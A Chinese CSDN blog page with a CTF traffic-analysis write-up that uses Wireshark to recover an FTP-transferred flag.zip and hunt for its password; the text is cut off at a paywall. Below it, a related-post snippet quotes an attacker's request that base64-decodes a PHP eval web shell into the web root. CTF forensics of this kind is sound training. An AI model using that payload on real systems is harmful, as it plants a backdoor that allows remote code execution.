2021-10-09 CTF-KX(第一场)-简单的流量分析2

最新推荐文章于 2024-04-10 19:43:21 发布
原创 最新推荐文章于 2024-04-10 19:43:21 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tcp/ip #c# #运维

本文介绍了在CTF比赛中通过Wireshark分析流量包,寻找FTP传输的flag.zip文件及密码的过程。利用明文FTP协议,导出并解密zip文件,最终通过莫尔斯码解密得到解压密码,成功打开文件获取flag。

题目所需文件
https://download.youkuaiyun.com/download/matthewfjnd/30047752

首先先用wireshark打开流量包,并搜索关键字flag,发现一个flag.zip的数据包
在这里插入图片描述
查看一下前后的数据流量包,发现了FTP传输flag.zip的痕迹
在这里插入图片描述
FTP是明文传输协议,我们可以直接将flag.zip的数据包导出,并保存为flag.zip文件
在这里插入图片描述
在这里插入图片描述
打开zip文件,发现需要密码
在这里插入图片描述
接着去数据包里面找密码,我们发现,流量包里除了一个flag.zip的文件外,还有一个pass.txt的文件,看起来像记录着密码的文本文件。
在这里插入图片描述
追踪TCP流,查看这个数据包所传输的内容

最低0.47元/天 解锁文章
CTF流量分析
Kiber
04-19 899
思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件。
数据分析方法论2——流量分析
weixin_30808575的博客
07-12 904
一、背景   有了指标体系和报表之后,最重要的事情就是每天看各种数据了,这也就是流量分析   流量分析:流量指的是广义的流量,从哪里来,经过什么,产生什么价值,如果它波动了,为何波动   1)渠道分析——从哪里来   2)转化分析——经过什么,比如漏斗,功能模块   3)价值分析——产生什么价值,是不是忠实用户等   4)波动分析——括日常监控分析,涨跌分析 二、渠道分...
流量分析2
qq_53229503的博客
02-02 312
流量分析,你知道完整内容是什么吗
CTF 流量相关-流量分析(2) RSA密钥流 traffic讲解
qq_56815564的博客
05-19 2808
本文是根据b站-风二西大佬的视频边做题边总结写成的,可以去支持一下风佬,风佬太强辣!!!另外上一期其实也可以看看的说,这一篇是上一期的后续吧然后后面那单独一道题,风佬也有视频在但老实说,我觉得风佬磁性的声音将起来有点抽象,自己理解还是好一点的,这里不是说风佬的不好啊(疯狂保命)
攻防世界--流量分析2
启程的Linux实验室
09-21 1655
攻防世界-流量分析2(难度1)题目WriteUp
2021-10-09 CTF-KX第一场-lsb
matthewfjnd的博客
10-09 2645
1、先丢入binwalk中分析有没有隐藏文件 发现存在zip文件,进一步分解 进入分解的目录中查看分解出了什么文件,发现有flag文件,将他复制出来进一步分析 用010editor打开flag文件,发现文件尾是GNP,显然是PNG文件头的逆序 编写脚本,将图片逆序 with open('flag','rb') as f1, open('flag.png','wb') as f2: f2.write(f1.read()[::-1]) 得到一张PNG图片 又是图片,进一步分析是否又隐藏文件.
精选资源
2021-10-12T15_46_29.634969+00_00misc题_流量分析.rar
10-21
标题 "2021-10-12T15_46_29.634969+00_00misc题_流量分析.rar" 暗示这是一个关于网络安全竞赛(CTF)的挑战,涉及的是流量分析方面的内容。描述提到“CTF附件题——MISC类型——数据库登录”,表明该挑战可能需要...
精选资源
CTF-MISC-流量分析解题思路汇总()
最新发布
12-11
CTF(Capture The Flag)是一种网络安全竞赛,其中MISC(杂项)类别常常含了流量分析等需要综合运用网络知识和分析技巧的题目。流量分析是指通过观察和分析网络中传输的数据来获取信息,这在网络安全领域尤为...
精选资源
2021-10-12T15_49_10.808949+00_00usb流量分析.zip
10-21
CTF附件题——usb流量分析 USB是 UniversalSerial Bus(通用串行总线)的缩写,是一个外部总线标准,用于规 范电脑与外部设备的连接和通讯,例如键盘、鼠标、打印机、磁盘或网络适配器等等。 通过对该接口流量的监听...
XCTF---MISC---流量分析2
liu914589417的博客
12-06 769
XCTF---MISC---流量分析2 flag:flag{17uaji1l} 解题思路---通过题目提示了解观察HTTP流量,进行HTTP流量筛选,导出数值按照规律得到flag。
ctf流量分析练习二
gclome的博客
09-06 4127
上次的流量分析做的我一个脑袋两个大!但是不能放弃啊,再找一些题来练练手 0x01 经典题型 CTF题型主要分为流量修复、WEB流量分析、USB流量分析和其他流量分析。 01 流量修复 比赛过程中有可能会出现通过wireshark打开题目给的流量后提示异常的情况,如下图所示: 解题思路: 通过在线pacp修复工具进行修复: http://f00l.de/hacking/pcapfix.php 修复之后,再次打开 用tcp contains “flag”,找到了下面这句话: 于是乎,flag就在
取证——流量分析2
m0_73756016的博客
04-10 871
DHCP(Dynamic Host Configuration Protocol,动态主机配置协议),前身是BOOTP协议,是一个局域网的网络协议,使用UDP协议工作,统一使用两个IANA分配的端口:67(服务器端),68(客户端)。DHCP通常被用于局域网环境,主要作用是集中的管理、分配IP地址,使client动态的获得IP地址、Gateway地址、DNS服务器地址等信息,能够提升地址的使用率。简单来说,DHCP就是一个不需要账号密码登录的、自动给内网机器分配IP地址等信息的协议。
流量分析练习2
qq_45766280的博客
08-27 770
流量分析2题解 题目:1.pcap 题解 这个文件不小,初步推断这次的会话会有文件传输里面应该会有文件,扔进binwalk里试了一下,没有什么东西。只能老老实实的做流量分析了。 wireshark中一个功能——统计,可以对的大小、协议进行归类统计。 统计->conversation,对内容大小进行排序 可以看到有两个比较大的,选择一个点击下面的Follow Stream...追踪流。第一个里面没有什么实用的信息,让我们来看看第二个 这个里面有几个比较重要的信息,第一个就是这个
流量分析第二题
admin的博客
07-30 583
题目地址:链接:https://pan.baidu.com/s/1NPEx6x4CfsevzGyDUG_Azw--来自百度网盘超级会员V3的分享。
流量分析二 攻防世界
qq_53105813的博客
08-19 1060
攻防世界题目解析
如何进行网站流量分析(二)
Running_Tiger的博客
02-06 3381
如何进行网站流量分析(二)流量分析常见分类指标是网站分析的基础,用来记录和衡量访问者在网站自的各种行为。比如我们经常说的流量就是一个网站指标,它是用来衡量网站获得的访问量。在进行流量分析之前,我们先来了解一些常见的指标。1. 骨灰级指标 IP:1 天之内,访问网站的不重复 IP 数。一天内相同 IP 地址多次访问网站只被计算 1 次。曾经 IP 指标可以用来表示用户访问身份,目前则更多的用来获取访问
渗透测试CTF-流量分析
保持微笑的博客
11-03 4663
渗透测试CTF-流量分析
CTF流量分析常见题型()-USB流量
热门推荐
qwzf
08-01 2万+
0x00 前言 在学习Wireshark常见使用时,对常见CTF流量分析题型和铁人三项流量分析题的部分问题进行了简单总结。由于篇幅过长,于是另起一篇总结常见流量分析。括USB流量分析和一些其他流量分析。 0x01 USB流量分析 USB流量指的是USB设备接口的流量,攻击者能够通过监听usb接口流量获取键盘敲击键、鼠标移动与点击、存储设备的铭文传输通信、USB无线网卡网络传输内容等等。在CTF中,USB流量分析主要以键盘和鼠标流量为主。 1、键盘流量 USB协议数据部分在Leftover Capt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值